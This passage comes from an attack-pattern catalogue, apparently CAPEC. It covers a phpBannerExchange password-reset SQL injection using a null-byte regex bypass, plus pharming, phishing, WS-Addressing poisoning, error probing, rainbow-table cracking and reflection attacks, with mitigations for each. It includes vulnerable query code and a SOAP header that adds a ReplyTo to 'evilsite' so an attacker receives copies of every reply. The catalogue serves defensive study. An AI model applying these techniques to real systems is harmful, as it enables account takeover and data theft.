A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user's password and taking over his account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module.
The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression:
if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*
(\.[a-z]{2,3})$", $email)){
A bug in the implementation of eregi() allows to pass additional character using a null byte "\0". Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the gular expression. So an e-mail address can be provided that includes the special character " ' " to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible:
$get_info=mysql_query("select * from banneruser where
email='$email' ");
This query will return a non-zero result set even though the email supplied (attacker's email) is not in the database.
Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system. Related Vulnerability | | Attacker Skill or Knowledge Required | Low: Brute force attack
Medium: Social engineering and more sophisticated technical attacks. | | Resources Required | For a brute force attack one would need a machine with sufficient CPU, RAM and HD. | | Probing Techniques | Trial and error (brute force). Social Engineering. | | Indicators-Warnings of Attack | Many incorrect attempts to answer the security question. | | Solutions and Mitigations | Use multiple security questions (e.g. have three and make the user answer two of them correctly). Let the user select their own security questions or provide them with choices of questions that are not generic. E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online. Ensure that your password recovery functionality is not vulnerable to an injection style attack. | | Attack Motivation-Consequences | | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 522 | Insufficiently Protected Credentials | Targeted | | 640 | Weak Password Recovery Mechanism for Forgotten Password | Targeted | | 718 | OWASP Top Ten 2007 Category A7 - Broken Authentication and Session Management | Targeted |
| | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Eugene Lebanidze | Cigital, Inc | 2007-02-26 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-03-01 | Review and revision of content |
|
| Attack Pattern ID | Pattern Abstraction: Standard 89 | | Typical Severity | Very High | | Description | Summary A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to his site rather than the originally intended one.
Pharming does not require script injection or clicking on malicious links for the attack to succeed. Attack Execution Flow Attacker sets up a system mocking the one trusted by the users. This is usually a website that requires or handles sensitive information. The attacker then poisons the resolver for the targeted site. This is achieved by poisoning the DNS server, or the local hosts file, that directs the user to the original website When the victim requests the URL for the site, the poisoned records direct the victim to the attacker's system rather than the original one. Because of the identical nature of the original site and the attacker controlled one, and the fact that the URL is still the original one, the victim trusts the website reached and the attacker can now "farm" sensitive information such as credentials or account numbers.
| | Attack Prerequisites | Vulnerable DNS software or improperly protected hosts file or router that can be poisoned A website that handles sensitive information but does not use a secure connection and a certificate that is valid is also prone to pharming | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Spoofing
- Analysis
- Modification of Resources
| | Examples-Instances | Description An online bank website requires users to provide their customer ID and password to log on, but does not use a secure connection.
An attacker can setup a similar fake site and leverage pharming to collect this information from unknowing victims. | | Attacker Skill or Knowledge Required | Medium: The attacker needs to be able to poison the resolver - DNS entries or local hosts file or router entry pointing to a trusted DNS server - in order to successfully carry out a pharming attack. Setting up a fake website, identical to the targeted one, does not require special skills. | | Resources Required | Except having enough knowledge of the way the targeted site has been structured in order to create a fake version, no additional resources are required. Poisoning the resolver requires knowledge of a vulnerability that can be exploited. | | Probing Techniques | The attacker observes the targeted website for use of secure connection to exchange sensitive information. If it does not use secure connections, victim users cannot distinguish between the original and fake versions of the website. The attacker can also fingerprint the software running on the targeted system (DNS server, router or host) and look for vulnerabilities in order to poison the entries. | | Solutions and Mitigations | All sensitive infomation must be handled over a secure connection. Known vulnerabilities in DNS or router software or in operating systems must be patched as soon as a fix has been released and tested. End users must ensure that they provide sensitive information only to websites that they trust, over a secure connection with a valid certificate issued by a well-known certificate authority. | | Attack Motivation-Consequences | | | Context Description | Pharming attacks occur when victims provide sensitive information to websites that do not possess a valid certificate from well-known certificate authorities. As a consequence, the attacker either can employ a certificate from a random authority or can get away without using one.
The use of valid certificates from well-known certificate authorities ensures that the URL hosting the website matches the IP address it is intended to resolve to, and that this fact has been attested to by a well-known authority.
If a mismatch is detected, the browser informs the user that the certificate is not a valid one. Of course, this depends on the user heeding such warnings and this makes such an attack all the more dangerous for users that are not security savvy.
Pharming originates when the DNS software or the local hosts resolution file can be poisoned or the router's trusted DNS server entry served to the clients is modified.
DNS cache poisoning can be avoided by regularly patching the software to keep it up-to-date to guard against vulnerabilities and not accepting DNS updates from anyone other than authenticated sources.
Similarly, the local hosts file and the router entries can be protected by appropriate access control and keeping the relevant software regularly patched. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 346 | Origin Validation Error | Targeted | | 247 | Reliance on DNS Lookups in a Security Decision | Targeted | | 292 | Trusting Self-reported DNS Name | Targeted |
| | Related Vulnerabilities | | Vulnerability-ID | Vulnerability Description |
|---|
| CVE-2005-0877 | Dnsmasq before 2.21 allows remote attackers to poison the DNS cache via answers to queries that were not made by Dnsmasq. | | CVE-2004-1754 | The DNS proxy (DNSd) for multiple Symantec Gateway Security products allows remote attackers to poison the DNS cache via a malicious DNS server query response that contains authoritative or additional records. |
| | Related Security Principles | - Reluctance To Trust
- Promoting Privacy
| | Related Guidelines | - Use Authentication Mechanisms, Where Appropriate, Correctly
- Use Well-Known Cryptography Appropriately and Correctly
| | Purpose | Reconnaissance | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| Client-Server | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | | 2007-03-12 | First Draft |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-04-16 | Review and revision of content |
|
| Attack Pattern ID | Pattern Abstraction: Standard 98 | | Typical Severity | Very High | | Description | Summary Phishing is a social engineering technique where an attacker masquerades as a legitimate entity with which the victim might do business in order to prompt the user to reveal some confidential information (very frequently authentication credentials) that can later be used by an attacker. Phishing is essentially a form of information gathering or "fishing" for information. Attack Execution Flow Explore Obtain domain name and certificate to spoof legitimate site: This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L) | env-Web | | Optionally obtain a legitimate SSL certificate for the new domain name. | env-Web |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c98s1sc1 | Preventative | Websites can acquire many domain names that are similar to their own. For example, the company example.com should be sure to register example.net, .org, .biz, .info and so on. Likewise they should register exarnple.com, examp1e.com, exampIe.com (and possibly .net, .org variations). Although this does not preclude the possibility of phishing, it makes the attacker's job harder because all the easily believable names are taken. |
Explore legitimate website and create duplicate: An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that he or she is trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Use spidering software to get copy of web pages on legitimate site. | env-Web | | Manually save copies of required web pages from legitimate site. | env-Web | | Create new web pages that have the legitimate site's look at feel, but contain completely new content. | env-Web |
Exploit Convince user to enter sensitive information on attacker's site.: An attacker sends an e-mail to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker's website) and log in. The key is to get the victim to believe that the e-mail is coming from a legitimate entity with which the victim does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link. | env-Web | | Place phishing link in post to online forum. | env-Web |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c98s3o1 | Success | Legitimate user clicks on link supplied by attacker and enters the requested information. | | c98s3o2 | Failure | Legitimate user realizes that the e-mail is not legitimate, or that the attacker's website is not legitimate, and therefore, does not enter the information requested by the attacker. |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c98s3sc1 | Detective | Monitor server logs for referrers. Phishing websites frequently include links to "terms and conditions" "privacy" and other standard links on the legitimate site. Users' web browsers will generally reveal the phishing site in the Referrer header. Since the URL may not visually stand out compared to the legitimate URL, some programmatic consolidation of referrers from log files may be required to ensure that example.com stands out from examp1e.com, for example. |
Use stolen credentials to log into legitimate site: Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim's login credentials to log into their bank account and transfer money to an account of their choice. | Attack Step
Technique |
|---|
| Description | Environments |
|---|
| Log in to the legitimate site using another user's supplied credentials | env-Web |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c98s4sc1 | Preventative | Use a human verifiable shared secret between legitimate site and end user such as the one provided by PassMark Security (now part of RSA Security). This prevents the attacker from using stolen credentials. Note that this does not protect against some man-in-the-middle attacks where an attacker establishes a session with the legitimate site and convinces an end user to establish a session with him. The attacker then records and forwards information flowing between the end user and the trusted site. This security control is currently used by many online banking websites including Bank of America's website. | | c98s4sc2 | Preventative | Use an out-of-band user authentication mechanism before allowing particular computers to "register" to use the legitimate site with particular login credentials. This also prevents the attacker from using stolen credentials. An example may be sending a SMS message to the user's cell phone (cell phone number previously acquired by site) with an "activation code" every time the user attempts to log into the site from a new computer. This solution also does not protect against the man-in-the-middle attack described in the previous security control.This mechanism is currently used by several online banking websites including JP Morgan Chase's website. |
| | Attack Prerequisites | An attacker needs to have a way to initiate contact with the victim. Typically that will happen through e-mail. An attacker needs to correctly guess the entity with which the victim does business and impersonate it. Most of the time phishers just use the most popular banks/services and send out their "hooks" to many potential victims. An attacker needs to have a sufficiently compelling call to action to prompt the user to take action. The replicated website needs to look extremely similar to the original website and the URL used to get to that website needs to look like the real URL of the said business entity. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Social Engineering
- Spoofing
| | Examples-Instances | Description John gets an official looking e-mail from his bank stating that his or her account has been temporarily locked due to suspected unauthorized activity and that John needs to click on the link included in the e-mail to log in to his bank account in order to unlock it. The link in the e-mail looks very similar to that of his bank and once the link is clicked, the log in page is the exact replica. John supplies his login credentials after which he is notified that his account has now been unlocked and that everything is fine. An attacker has just collected John's online banking information which can now be used by him or her to log into John's bank account and transfer John's money to a bank account of the attacker's choice. | | Attacker Skill or Knowledge Required | Medium | | Resources Required | Some web development tools to put up a fake website. | | Indicators-Warnings of Attack | You receive an e-mail from an entity that you are not even a customer of prompting you to log into your account. You receive any e-mail that provides you with a link which takes you to a website on which you need to enter your log in information. | | Obfuscation Techniques | Making the link in the e-mail and the actual website look very legitimate. | | Solutions and Mitigations | Do not follow any links that you receive within your e-mails and certainly do not input any login credentials on the page that they take you too. Instead, call your Bank, Paypal, Ebay, etc., and inquire about the problem. A safe practice would also be to type the URL of your bank in the browser directly and only then log in. Also, never reply to any e-mails that ask you to provide sensitive information of any kind. | | Attack Motivation-Consequences | - Privilege Escalation
- Information Leakage
- Data Modification
| | Purpose | Reconnaissance | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| Client-Server | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc. | 2007-03-25 | Identified priority for pattern creation |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Evgeny Lebanidze | Cigital, Inc., | 2007-03-22 | Fleshed out content for pattern | | Sean Barnum | Cigital, Inc | 2007-04-16 | Review and revise | | Amit Sethi | Cigital, Inc. | 2007-10-29 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 51 | | Typical Severity | Very High | | Description | Summary SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata (to effect a denial of service), and delete information about service provider interfaces.
WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. The attacker that can rewrite WS-addressing information gains the ability to route service requesters to any service providers, and the ability to route service provider response to any service.
Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol. The basic flow for the attacker consists of either altering the data at rest in the registry or uploading malicious content by spoofing a service provider. The service requester is then redirected to send its requests and/or responses to services the attacker controls. | | Attack Prerequisites | The attacker must be able to write to resources or redirect access to the service registry. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Modification of Resources
- Injection
- Protocol Manipulation
| | Examples-Instances | Description WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime.
<S:Header>
<wsa:MessageID>
http://example.com/Message
</wsa:MessageID>
<wsa:ReplyTo>
<wsa:Address>http://valid.example/validClient</wsa:Address>
</wsa:ReplyTo>
<wsa:ReplyTo>
<wsa:Address>http://evilsite/evilClient</wsa:Address>
</wsa:ReplyTo>
<wsa:FaultTo>
<wsa:Address>http://validfaults.example/ErrorHandler</wsa:Address>
</wsa:FaultTo>
</S:Header>
In this example evilsite is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with REpolyTo header it will not generate a Soap fault. | | Attacker Skill or Knowledge Required | Low: to identify and execute against an overprivileged system interface | | Resources Required | Capability to directly or indirectly modify registry resources | | Solutions and Mitigations | Design: Enforce principle of least privilege Design: Harden registry server and file access permissions Implementation: Implement communications to and from the registry using secure protocols | | Attack Motivation-Consequences | - Run Arbitrary Code
- Information Leakage
- Data Modification
| | Injection Vector | Payload delivered through standard communication protocols, such as UDDI or WS-Addressing. | | Payload | Command(s) executed directly on service requester, in the case of redirect, or on the service provider, in the case of the additional replto attack. | | Activation Zone | Client machine and client network | | Payload Activation Impact | Enables attacker to execute server side code with any commands that the program owner has privileges to. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 285 | Improper Access Control (Authorization) | Targeted | | 74 | Failure to Sanitize Data into a Different Plane (aka 'Injection') | Targeted | | 693 | Protection Mechanism Failure | Targeted |
| | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| SOA | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Gunnar Peterson | | 2007-02-28 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-03-07 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Name | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 54 | | Typical Severity | Low | | Description | Summary An Attacker, aware of an application's location (and possibly authorized to use the application) can probe the application's structure and evaluate its robustness by probing its error conditions (not unlike one would during a 'fuzz' test, but more purposefully here) in order to support attacks such as blind SQL injection, or for the more general task of mapping the application to mount another subsequent attack. Attack Execution Flow Determine user-controllable parameters of the application Inject each parameter with content that causes an error condition to manifest Modify the content of each parameter aaccording to observed error conditions Repeat above steps with enough parameters until the application has been sufficiently mapped out to launch desired attack (for example, Blind SQL Injection)
| | Attack Prerequisites | This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | | | Examples-Instances | Description Blind SQL injection is an example of this technique, applied to successful exploit. Related Vulnerability Description Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality.
In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them. | | Attacker Skill or Knowledge Required | Medium: Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design. | | Resources Required | The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the attacker.
The Attack does not need special hardware, software, skills, or access. | | Indicators-Warnings of Attack | Repeated errors generated by the same piece of code are an indication, although it requires careful monitoring of the application and its associated error logs, if any. | | Obfuscation Techniques | To defeat correlation, the attacker may try changing the origin IP addresses or client browser identification strings or start a new session from where he left off; any technique aimed at defeating the use of certain identification parameters for correlation goes a small way in obfuscating the attack. | | Solutions and Mitigations | Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally. Application designers can wrap application functionality (preferrably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion. | | Attack Motivation-Consequences | | | Context Description | This pattern applies in the context of an application that can not be directly reverse engineered, and thus requires the attacker to conduct reverse engineering exercises indirectly as described. | | Injection Vector | User-controllable input | | Payload | Content, based on application context, crafted to elicit error conditions from the application | | Activation Zone | Error Handling mechanism within the application | | Payload Activation Impact | The impact of activation is an error condition that, hopefully for the attacker, reveals sufficient information to further map the application. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 209 | Error Message Information Leak | Targeted | | 248 | Uncaught Exception | Secondary | | 717 | OWASP Top Ten 2007 Category A6 - Information Leakage and Improper Error Handling | Targeted |
| | Relevant Security Requirements | Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database. Employ application-level safeguards to filter data and handle exceptions gracefully. | | Related Security Principles | - Failing Securely
- Defense in Depth
| | Related Guidelines | - Never Use Input as Part of a Directive to any Internal Component
- Handle All Errors Safely
| | Purpose | Reconnaissance | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Medium | Medium | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | CWE - Input Validation CWE - Improper Error Handling | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| John Steven | Cigital, Inc | 2007-02-10 | Initial core pattern content |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | Cigital, Inc | 2007-02-23 | Fleshed out pattern with extra content |
|
| Attack Pattern ID | Pattern Abstraction: Standard 55 | | Typical Severity | Medium | | Description | Summary An attacker gets access to the database table where hashes of passwords are stored. He then uses a rainbow table of precomputed hash chains to attempt to look up the original password. Once the original password corresponding to the hash is obtained, the attacker uses the original password to gain access to the system.
A pasword rainbow table stores hash chains for various passwords. A password chain is computed, starting from the original password, P, via a a reduce(compression) function R and a hash function H. A recurrence relation exists where Xi+1 = R(H(Xi)), X0 = P. Then the hash chain of length n for the original password P can be formed: X1, X2, X3, ... , Xn-2, Xn-1, Xn, H(Xn). P and H(Xn) are then stored together in the rainbow table.
Constructing the rainbow tables takes a very long time and is computationally expensive. A separate table needs to be constrcuted for the various hash algorithms (e.g. SHA1, MD5, etc.). However, once a rainbow table is computed, it can be very effective in cracking the passwords that have been hashed without the use of salt. Attack Execution Flow Explore Determine application's/system's password policy: Determine the password policies of the target application/system. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Determine minimum and maximum allowed password lengths. | env-All | | Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.). | env-All | | Determine account lockout policy (a strict account lockout policy will prevent brute force attacks). | env-All |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c55s1i1 | Positive | Passwords are used in the application/system | env-All | | c55s1i2 | Negative | Passwords are not used in the application/system | env-All |
Obtain password hashes: An attacker gets access to the database table storing hashes of passwords or potentially just discovers a hash of an indivual password. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Obtain copy of database table or flat file containing password hashes (by breaking access controls, using SQL Injection, etc.) | env-All | | Obtain password hashes from platform-specific storage locations (e.g. Windows registry) | env-All | | Sniff network packets containing password hashes. | env-Web env-Peer2Peer env-ClientServer env-CommProtocol |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c55s2i1 | Negative | Password authentication not used in application/system. | env-All |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c55s2o1 | Success | At least one (unsalted) password hash obtained. | | c55s2o2 | Failure | No password hashes obtained by attacker. |
Exploit Run rainbow table-based password cracking tool: An attacker finds or writes a password cracking tool that uses a previously computed rainbow table for the right hashing algorithm. It helps if the attacker knows what hashing algorithm was used by the password system. | Attack Step
Technique |
|---|
| Description | Environments |
|---|
| Run rainbow table-based password cracking tool such as Ophcrack or RainbowCrack. Reduction function must depend on application's/system's password policy. | env-All |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c55s3i1 | Positive | Success outcome in step 2. | env-All | | c55s3i2 | Negative | Failure outcome in step 2. | env-All |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c55s3o1 | Success | A password corresponding to the hash recovered. | | c55s3o2 | Failure | Password corresponding to the hash could not be recovered with the given rainbow table. |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c55s3sc1 | Preventative | Include salts in hashes. |
| | Attack Prerequisites | Hash of the original password is available to the attacker. For a better chance of success, an attacker should have more than one hash of the original password, and ideally the whole table. Salt was not used to create the hash of the original password. Otherwise the rainbow tables have to be reocmputed, which is very expensive and will make the attack effectively infeasible (especially if salt was added in iterations). The system uses one factor password based authentication. | | Typical Likelihood of Exploit |
Medium
| | Methods of Attack | | | Examples-Instances | Description BusyBox 1.1.1 does not use a salt when generating passwords, which makes it easier for local users to guess passwords from a stolen password file using techniques such as rainbow tables. Related Vulnerability | | Attacker Skill or Knowledge Required | Low: A variety of password cracking tools are available that can leverage a rainbow table. The more difficult part is to obtain the password hash(es) in the first place. | | Resources Required | Rainbow table of password hash chains with the right algorithm used. A password cracking tool that leverages this rainbow table will also be required. Hash(es) of the password is required. | | Indicators-Warnings of Attack | This is a completely offline attack that an attacker can perform at their lesure after the password hashes are obtained. | | Solutions and Mitigations | Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it. | | Attack Motivation-Consequences | | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 261 | Weak Cryptography for Passwords | Targeted | | 521 | Weak Password Requirements | Targeted | | 262 | Not Using Password Aging | Secondary | | 263 | Password Aging with Long Expiration | Secondary | | 693 | Protection Mechanism Failure | Targeted | | 719 | OWASP Top Ten 2007 Category A8 - Insecure Cryptographic Storage | Secondary |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 49 | Password Brute Forcing | More Abstract | | | 70 | Try Common(default) Usernames and Passwords | More Detailed | | | 16 | Dictionary-based Password Attack | More Abstract | |
| | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Eugene Lebanidze | Cigital, Inc | 2007-02-26 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-03-01 | Review and revision of content | | Amit Sethi | Cigital, Inc. | 2007-10-29 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 90 | | Typical Severity | High | | Description | Summary An attacker can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the attacker illegitimate access to the target system, without possessing the requisite credentials.
Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An attacker can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication. Attack Execution Flow The attacker opens a connection to the target server and sends it a challenge The server responds by returning the challenge encrypted with a shared secret as well as its own challenge to the attacker Since the attacker does not possess the shared secret, he initiates a second connection to the server and sends it, as challenge, the challenge received from the server on the first connection The server treats this as just another handshake and responds by encrypting the challenge and issuing its own to the attacker The attacker now receives the encrypted challenge on the second connection and sends it as response to the server on the first connection, thereby successfully completing the handshake and authenticating to the server.
| | Attack Prerequisites | The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attacker's ability to attack the authentication protocol. | | Typical Likelihood of Exploit |
High
Authentication is usually used as a means to identify and grant access to the user. If the authentication protocol can be defeated, in this instance by a reflection attack, authentication serves no purpose in identifying the legitimate users of the system from the ilegitimate ones
| | Methods of Attack | - Protocol Manipulation
- Spoofing
| | Examples-Instances | Description A single sign-on solution for a network uses a fixed preshared key with its clients to initiate the signon process in order to avoid eavesdropping on the initial exchanges.
An attacker can use a reflection attack to mimick a trusted client on the network to particpate in the signon exchange. | | Attacker Skill or Knowledge Required | Medium: The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges | | Resources Required | All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately. | | Solutions and Mitigations | The server must initiate the handshake by issuing the challenge. This ensures that the client has to respond before the exchange can move any further The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the preshared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid preshared secret can successfully hash in the two values. Introducing a random nonce with each new connection ensures that the attacker can not employ two connections to attack the authentication protocol | | Attack Motivation-Consequences | - Privilege Escalation
- Information Leakage
| | Context Description | The context of this attack vector is an authentication protocol where the server is ready to encrypt challenges.
Such challenge-response protocols are to be seen in communications on a nework between a client and servers, or between systems such as routers that require authenticating to each other. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 301 | Reflection Attack in an Authentication Protocol | Targeted | | 303 | Improper Implementation of Authentication Algorithm | Secondary | | 718 | OWASP Top Ten 2007 Category A7 - Broken Authentication and Session Management | Targeted |
| | Related Security Principles | - Reluctance To Trust
- Complete Mediation
- Defense in Depth
| | Related Guidelines | - Use Authentication Mechanisms, Where Appropriate, Correctly
| | Purpose | Penetration Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| Client-Server | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | | 2007-03-13 | First Draft |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-04-16 | Review and revision of content |
|
| Attack Pattern ID | Pattern Abstraction: Standard 56 | | Typical Severity | Very High | | Description | Summary Attackers can, in some cases, get around logic put in place to 'guard' sensitive functionality or data.
The attack may involve gaining access to and calling protected functionality (or accessing protected data) directly, may involve subverting some aspect of the guard's implementation, or outright removal of the guard, if possible. Attack Execution Flow The attacker determines, through brute-forcing, reverse-engineering or other similar means, the location and logic of the guard element The attacker then tries to determine the mechanism to circumvent the guard. Once the mechanism has been determined, the attacker proceeds to access the protected functionality
| | Attack Prerequisites | The Attacker must have reverse-engineered the application and its design extensively enough to have determined that a guard element exists. This may have been done as simply as through probing (and likely receiving too verbose an error message) or could have involved high-brow techniques supported by advanced reverse engineering/debugging tools. | | Typical Likelihood of Exploit |
Medium
| | Examples-Instances | Description Attacker uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they're not authorized to use, the Attacker directly navigates to the privileged functionality arund the authorizing single-front controller (implementing programmatic authorization checks). Description Attacker reverse-engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the Attacker simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary. | | Attacker Skill or Knowledge Required | Medium: The attacker must ability to understand complex design logic as well as possibly the ability to reverse-engineer the design and code to determine placement and logic of guard element. | | Resources Required | The attacker needs the ability to explore the application's functionality and response to various conditions.
In cases where the guard component sits server-side, the attacker will likely require a valid login.
